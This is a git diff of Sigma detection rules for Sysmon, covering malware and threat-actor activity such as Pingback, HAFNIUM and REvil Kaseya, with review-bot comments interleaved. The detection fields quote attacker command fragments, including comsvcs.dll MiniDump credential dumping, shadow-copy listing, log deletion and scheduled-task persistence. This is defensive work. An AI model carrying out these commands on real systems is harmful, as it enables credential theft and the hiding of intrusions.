b/sigma/sysmon/emerging-threats/2021/Malware/Devil-Bait/file_event_win_malware_devil_bait_script_drop.yml 
@@ -1,9 +1,7 @@ title: Potential Devil Bait Related Indicator id: 93d5f1b4-36df-45ed-8680-f66f242b8415 status: experimental -description: Detects the creation of ".xml" and ".txt" files in folders of the "\AppData\Roaming\Microsoft" - directory by uncommon processes. This behavior was seen common across different - Devil Bait samples and stages as described by the NCSC +description: Detects the creation of ".xml" and ".txt" files in folders of the "\AppData\Roaming\Microsoft" directory by uncommon processes. This behavior was seen common across different Devil Bait samples and stages as described by the NCSC references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf author: Nasreddine Bencherchali (Nextron Systems) @@ -24,6 +22,9 @@ detection: - \schtasks.exe - \wscript.exe - \mshta.exe + # Example folders used by the samples include: + # - %AppData%\Microsoft\Network\ + # - %AppData%\Microsoft\Office\ TargetFilename|contains: \AppData\Roaming\Microsoft\ TargetFilename|endswith: - .txt diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml b/sigma/sysmon/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml index 48eb18adf..db5e65b15 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml @@ -1,8 +1,8 @@ title: Potential Devil Bait Malware Reconnaissance id: e8954be4-b2b8-4961-be18-da1a5bda709c related: - - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 - type: derived + - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 + type: derived status: experimental description: Detects specific process behavior observed with Devil Bait samples references: 
@@ -25,12 +25,14 @@ detection: selection_redirect: ParentImage|endswith: \wscript.exe Image|endswith: \cmd.exe - CommandLine|contains: '>>%APPDATA%\Microsoft\' - CommandLine|endswith: + CommandLine|contains: '>>%APPDATA%\Microsoft\' + CommandLine|endswith: - .xml - .txt selection_recon_cmd: - CommandLine|contains: + CommandLine|contains: + # Taken from a6f9043627f8be2452153b5dbf6278e9b91763c3b5c2aea537a859e0c8c6b504 + # If you find samples using other commands please add them - dir - ipconfig /all - systeminfo diff --git a/sigma/sysmon/emerging-threats/2021/Malware/FoggyWeb/image_load_malware_foggyweb_nobelium.yml b/sigma/sysmon/emerging-threats/2021/Malware/FoggyWeb/image_load_malware_foggyweb_nobelium.yml index d9dedb11b..496f78e8e 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/FoggyWeb/image_load_malware_foggyweb_nobelium.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/FoggyWeb/image_load_malware_foggyweb_nobelium.yml @@ -1,8 +1,7 @@ title: FoggyWeb Backdoor DLL Loading id: 640dc51c-7713-4faa-8a0e-e7c0d9d4654c status: test -description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. - Which loads a malicious version of the expected "version.dll" dll +description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll references: - https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/ author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml b/sigma/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml index 18269e3b5..0e6c4d0a7 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml 
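Review bot: `- dir` under `CommandLine|contains` in `selection_recon_cmd` is a bare three-letter substring, so on its own it matches any command line containing `redirect`, `mkdir` or a path with `dir` in it, unlike the other entries (`ipconfig /all`, `systeminfo`). Whether this matters depends on the rule's `condition`, which lies outside the hunk: if `selection_recon_cmd` is only evaluated together with `selection_redirect` (wscript parent, cmd.exe child, `>>%APPDATA%\Microsoft\`) the overmatch is contained; otherwise anchoring the entry as `- ' dir '` keeps the intent. The added comment naming the sample hash is useful for future maintainers.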
+++ b/sigma/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml @@ -1,8 +1,7 @@ title: Potential Goofy Guineapig Backdoor Activity id: 477a5ed3-a374-4282-9f3b-ed94e159a108 status: experimental -description: Detects a specific broken command that was used by Goofy-Guineapig as - described by the NCSC report. +description: Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report. references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf author: X__Junior (Nextron Systems) @@ -19,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: choice /t %d /d y /n >nul + CommandLine|contains: choice /t %d /d y /n >nul condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml b/sigma/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml index 03e4a3896..b79d2bca8 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml 
@@ -1,8 +1,7 @@ title: Potential Goofy Guineapig GoolgeUpdate Process Anomaly id: bdbab15a-3826-48fa-a1b7-723cd8f32fcc status: experimental -description: Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon - location as seen used by the Goofy Guineapig backdoor +description: Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) @@ -22,10 +21,10 @@ detection: ParentImage|endswith: \GoogleUpdate.exe Image|endswith: \GoogleUpdate.exe filter_main_legit_paths: - - Image|startswith: - - C:\Program Files\Google\ - - C:\Program Files (x86)\Google\ - - Image|contains: \AppData\Local\Google\Update\ + - Image|startswith: + - C:\Program Files\Google\ + - C:\Program Files (x86)\Google\ + - Image|contains: \AppData\Local\Google\Update\ condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Moriya-Rootkit/file_event_win_moriya_rootkit.yml b/sigma/sysmon/emerging-threats/2021/Malware/Moriya-Rootkit/file_event_win_moriya_rootkit.yml index d29c68c39..84672d311 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Moriya-Rootkit/file_event_win_moriya_rootkit.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Moriya-Rootkit/file_event_win_moriya_rootkit.yml 
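Review bot: The `title:` context line of the first hunk spells the product name `GoolgeUpdate`, while the selection and description in the same rule use `GoogleUpdate.exe`; it should read `title: Potential Goofy Guineapig GoogleUpdate Process Anomaly`. The commit reflows the description directly below it but leaves the typo in place, and since titles are what analysts search on it is worth fixing in the same pass.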
@@ -1,12 +1,10 @@ title: Moriya Rootkit File Created id: a1507d71-0b60-44f6-b17c-bf53220fdd88 related: - - id: 25b9c01c-350d-4b95-bed1-836d04a4f324 - type: derived + - id: 25b9c01c-350d-4b95-bed1-836d04a4f324 + type: derived status: test -description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a - specific location. This filename was reported to be related to the Moriya rootkit - as described in the securelist's Operation TunnelSnake report. +description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report. references: - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831 author: Bhabesh Raj diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Pingback/file_event_win_malware_pingback_backdoor.yml b/sigma/sysmon/emerging-threats/2021/Malware/Pingback/file_event_win_malware_pingback_backdoor.yml index 37cc0432b..63cc8ca81 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Pingback/file_event_win_malware_pingback_backdoor.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Pingback/file_event_win_malware_pingback_backdoor.yml 
@@ -1,13 +1,12 @@ title: Pingback Backdoor File Indicators id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 related: - - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b - type: similar - - id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 - type: similar + - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b # DLL Load + type: similar + - id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 # Process Creation + type: similar status: test -description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 - as described in the trustwave report +description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report references: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Pingback/image_load_malware_pingback_backdoor.yml b/sigma/sysmon/emerging-threats/2021/Malware/Pingback/image_load_malware_pingback_backdoor.yml index b095c2143..fdedbd7ed 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Pingback/image_load_malware_pingback_backdoor.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Pingback/image_load_malware_pingback_backdoor.yml 
@@ -1,13 +1,12 @@ title: Pingback Backdoor DLL Loading Activity id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b related: - - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b - type: similar - - id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 - type: similar + - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b # File indicators + type: similar + - id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 # Process Creation + type: similar status: test -description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 - as described in the trustwave report +description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report references: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml b/sigma/sysmon/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml index 49a4d0ce3..b1cf6a588 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml 
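Review bot: The first `related` entry on the new side points at this rule's own `id` (35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b) while the added comment labels it `# File indicators`; the file-indicators rule in this same commit carries id 2bd63d53-84d4-4210-80ff-bf0658f1bf78, so the line should read `- id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 # File indicators`. The sibling file_event and proc_creation hunks cross-reference each other correctly, so only this file is affected. A self-reference in `related` is a metadata error that any tooling cross-linking rules would propagate silently.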
@@ -1,13 +1,12 @@ title: Pingback Backdoor Activity id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 related: - - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b - type: similar - - id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 - type: similar + - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b # DLL Load + type: similar + - id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 # File Indicators + type: similar status: test -description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 - as described in the trustwave report +description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report references: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 @@ -28,7 +27,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: ParentImage|endswith: \updata.exe - CommandLine|contains|all: + CommandLine|contains|all: - config - msdtc - start diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/file_event_win_malware_small_sieve_evasion_typo.yml b/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/file_event_win_malware_small_sieve_evasion_typo.yml index 17e4047df..22d43b5a5 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/file_event_win_malware_small_sieve_evasion_typo.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/file_event_win_malware_small_sieve_evasion_typo.yml 
@@ -1,8 +1,7 @@ title: Small Sieve Malware File Indicator Creation id: 39466c42-c189-476a-989f-8cdb135c163a status: experimental -description: Detects filename indicators that contain a specific typo seen used by - the Small Sieve malware. +description: Detects filename indicators that contain a specific typo seen used by the Small Sieve malware. references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml b/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml index 0a820ea15..d6360b863 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml @@ -1,8 +1,7 @@ title: Small Sieve Malware CommandLine Indicator id: 21117127-21c8-437a-ae03-4b51e5a8a088 status: test -description: Detects specific command line argument being passed to a binary as seen - being used by the malware Small Sieve. +description: Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve. references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf author: Nasreddine Bencherchali (Nextron Systems) @@ -20,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|endswith: .exe Platypus + CommandLine|endswith: .exe Platypus condition: process_creation and selection falsepositives: - Unlikely 
diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml b/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml index ee4ce5fd5..50ba26a29 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml @@ -1,8 +1,7 @@ title: Small Sieve Malware Registry Persistence id: 65c6e3c1-fb28-4c03-a51e-84919d8185f1 status: experimental -description: Detects registry value with specific intentional typo and strings seen - used by the Small Sieve malware +description: Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf author: Nasreddine Bencherchali (Nextron Systems) @@ -22,8 +21,8 @@ detection: selection_path: TargetObject|contains: \Microsoft\Windows\CurrentVersion\Run\ selection_value: - - TargetObject|contains: Microsift - - Details|contains: .exe Platypus + - TargetObject|contains: Microsift + - Details|contains: .exe Platypus condition: registry_set and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml b/sigma/sysmon/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml index 4402584b9..45f377839 100644 --- a/sigma/sysmon/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml +++ b/sigma/sysmon/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml 
@@ -1,8 +1,7 @@ title: HAFNIUM Exchange Exploitation Activity id: bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7 status: test -description: Detects activity observed by different researchers to be HAFNIUM group - activity (or related) on Exchange servers +description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers references: - https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/ - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ @@ -27,17 +26,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_attrib: - CommandLine|contains|all: + CommandLine|contains|all: - attrib - ' +h ' - ' +s ' - ' +r ' - .aspx selection_vsperfmon: - - Image|contains: \ProgramData\VSPerfMon\ - - CommandLine|contains|all: - - schtasks - - VSPerfMon + - Image|contains: \ProgramData\VSPerfMon\ + - CommandLine|contains|all: + - schtasks + - VSPerfMon selection_opera_1: Image|endswith: Opera_browser.exe ParentImage|endswith: @@ -46,33 +45,33 @@ detection: selection_opera_2: Image|endswith: Users\Public\opera\Opera_browser.exe selection_vssadmin: - CommandLine|contains|all: + CommandLine|contains|all: - vssadmin list shadows - Temp\__output selection_makecab_1: Image|endswith: \makecab.exe - CommandLine|contains|all: + CommandLine|contains|all: - inetpub\wwwroot\ - .dmp.zip selection_makecab_2: Image|endswith: \makecab.exe - CommandLine|contains: + CommandLine|contains: - Microsoft\Exchange Server\ - compressionmemory - .gif selection_7zip: - CommandLine|contains|all: + CommandLine|contains|all: - ' -t7z ' - C:\Programdata\pst - \it.zip selection_rundll32: - CommandLine|contains|all: + CommandLine|contains|all: - \comsvcs.dll - Minidump - 'full ' - \inetpub\wwwroot selection_other: - CommandLine|contains: + CommandLine|contains: - Windows\Temp\xx.bat - Windows\WwanSvcdcs - Windows\Temp\cw.exe 
diff --git a/sigma/sysmon/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml b/sigma/sysmon/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml index e671fb6cd..4e513303f 100644 --- a/sigma/sysmon/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml +++ b/sigma/sysmon/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml @@ -1,8 +1,7 @@ title: REvil Kaseya Incident Malware Patterns id: 5de632bc-7fbd-4c8a-944a-fce55c59eae5 status: test -description: Detects process command line patterns and locations used by REvil group - in Kaseya incident (can also match on other malware) +description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware) references: - https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers - https://www.joesandbox.com/analysis/443736/0/html @@ -26,7 +25,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: + CommandLine|contains: - C:\Windows\cert.exe - del /q /f c:\kworking\agent.crt - Kaseya VSA Agent Hot-fix @@ -42,7 +41,7 @@ detection: - C:\kworking\agent.exe - C:\kworking1\agent.exe selection3: - CommandLine|contains|all: + CommandLine|contains|all: - del /s /q /f - WebPages\Errors\webErrorLog.txt condition: process_creation and (1 of selection*) diff --git a/sigma/sysmon/emerging-threats/2021/TA/PRIVATELOG/image_load_usp_svchost_clfsw32.yml b/sigma/sysmon/emerging-threats/2021/TA/PRIVATELOG/image_load_usp_svchost_clfsw32.yml index 9bf78fce3..fc4040b5e 100644 --- a/sigma/sysmon/emerging-threats/2021/TA/PRIVATELOG/image_load_usp_svchost_clfsw32.yml +++ b/sigma/sysmon/emerging-threats/2021/TA/PRIVATELOG/image_load_usp_svchost_clfsw32.yml 
@@ -1,8 +1,7 @@ title: APT PRIVATELOG Image Load Pattern id: 33a2d1dd-f3b0-40bd-8baf-7974468927cc status: test -description: Detects an image load pattern as seen when a tool named PRIVATELOG is - used and rarely observed under legitimate circumstances +description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances references: - https://web.archive.org/web/20210901184449/https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml b/sigma/sysmon/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml index ab932d9c1..42588a14d 100644 --- a/sigma/sysmon/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml +++ b/sigma/sysmon/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml @@ -33,9 +33,9 @@ detection: Image|contains: - windows\system32\filepath2 - windows\system32\ime - CommandLine|contains: reg add + CommandLine|contains: reg add registry_key: - CommandLine|contains: + CommandLine|contains: - HKEY_LOCAL_MACHINE\software\classes\clsid\{7c857801-7381-11cf-884d-00aa004b2e24}\inprocserver32 - HKEY_LOCAL_MACHINE\software\classes\clsid\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\inprocserver32 condition: process_creation and (selection or all of registry_*) diff --git a/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-24527/file_event_win_cve_2022_24527_lpe.yml b/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-24527/file_event_win_cve_2022_24527_lpe.yml index 8948b5a00..71a57b5a9 100644 --- a/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-24527/file_event_win_cve_2022_24527_lpe.yml +++ b/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-24527/file_event_win_cve_2022_24527_lpe.yml 
@@ -1,8 +1,7 @@ title: CVE-2022-24527 Microsoft Connected Cache LPE id: e0a41412-c69a-446f-8e6e-0e6d7483dad7 status: test -description: Detects files created during the local privilege exploitation of CVE-2022-24527 - Microsoft Connected Cache +description: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache references: - https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/ author: Florian Roth (Nextron Systems) @@ -23,7 +22,7 @@ detection: selection: TargetFilename|endswith: WindowsPowerShell\Modules\webAdministration\webAdministration.psm1 filter: - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI condition: file_event and (selection and not filter) diff --git a/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-26809/proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml b/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-26809/proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml index 1363f9691..67c645075 100644 --- a/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-26809/proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml +++ b/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-26809/proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml 
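Review bot: The added comment `# covers many language settings` on the `User|contains` filter does not say what the two fragments stand for or that the match is substring-based. `AUTHORI` / `AUTORI` presumably catch `NT AUTHORITY` and localized spellings such as `NT-AUTORITÄT` or `AUTORITE NT`, but `contains` also excludes any account whose name happens to contain those letters, which is a wider exclusion than the comment implies. Suggest `# substring match for "NT AUTHORITY" and localized forms (e.g. "NT-AUTORITÄT", "AUTORITE NT"); any user name containing these letters is also excluded`.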
@@ -1,9 +1,7 @@ title: Potential CVE-2022-26809 Exploitation Attempt id: a7cd7306-df8b-4398-b711-6f3e4935cf16 status: test -description: Detects suspicious remote procedure call (RPC) service anomalies based - on the spawned sub processes (long shot to detect the exploitation of vulnerabilities - like CVE-2022-26809) +description: Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809) references: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809 - https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html diff --git a/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml b/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml index df52af902..931cae025 100644 --- a/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml +++ b/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml 
@@ -1,16 +1,10 @@ title: Potential CVE-2022-29072 Exploitation Attempt id: 9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3 status: test -description: 'Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege - escalation and command execution vulnerability. - - 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) - and command execution when a file with the .7z extension is dragged to the Help>Contents - area. This is caused by misconfiguration of 7z.dll and a heap overflow. - +description: | + Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. + 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process. - - ' references: - https://github.com/kagancapar/CVE-2022-29072 - https://twitter.com/kagancapar/status/1515219358234161153 @@ -30,17 +24,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_parent: ParentImage|endswith: \7zFM.exe filter_bat: - CommandLine|contains: + CommandLine|contains: - ' /c ' - ' /k ' - ' /r ' filter_null: - CommandLine: null + CommandLine: condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml b/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml index ccd5cf5c9..ef94c963e 100644 
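Review bot: `filter_null` now reads `CommandLine:` with no value; YAML parses an empty scalar as null, so behavior is unchanged, but the explicit `CommandLine: null` was self-documenting and a reader cannot tell whether the value was dropped by accident. The same change appears in the `filter_main_null` hunk of the CVE-2022-41120 rule in the next file. If the bare form is what the converter emits, a short comment such as `CommandLine: # null: matches events with no command line` would make the intent explicit.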
--- a/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml +++ b/sigma/sysmon/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml @@ -1,8 +1,7 @@ title: Suspicious Sysmon as Execution Parent id: 6d1058a4-407e-4f3a-a144-1968c11dc5c3 status: experimental -description: Detects suspicious process executions in which Sysmon itself is the parent - of a process, which could be a sign of exploitation (e.g. CVE-2022-41120) +description: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120) references: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120 - https://twitter.com/filip_dragovic/status/1590052248260055041 @@ -32,13 +31,13 @@ detection: - :\Windows\Sysmon.exe - :\Windows\Sysmon64.exe - :\Windows\System32\conhost.exe - - :\Windows\System32\WerFault.exe - - :\Windows\System32\WerFaultSecure.exe + - :\Windows\System32\WerFault.exe # When Sysmon crashes + - :\Windows\System32\WerFaultSecure.exe # When Sysmon crashes - :\Windows\System32\wevtutil.exe - :\Windows\SysWOW64\wevtutil.exe - - \AppData\Local\Temp\Sysmon.exe + - \AppData\Local\Temp\Sysmon.exe # When launching Sysmon 32bit version. filter_main_null: - Image: null + Image: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml b/sigma/sysmon/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml index 93d101092..37bfacc7c 100644 --- a/sigma/sysmon/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml +++ b/sigma/sysmon/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml 
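Review bot: The new comment `# When launching Sysmon 32bit version.` on the `\AppData\Local\Temp\Sysmon.exe` filter entry does not mention that this path is in a user-writable directory, unlike the other entries under `:\Windows\`, so this exclusion is materially weaker than its neighbours. The operator applied to these values (`endswith` or `contains`) is outside the hunk, so the exact breadth cannot be confirmed here. Suggest `# When launching Sysmon 32bit version (user-writable location; weaker exclusion than the System32 entries)` so tuners know the trade-off.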
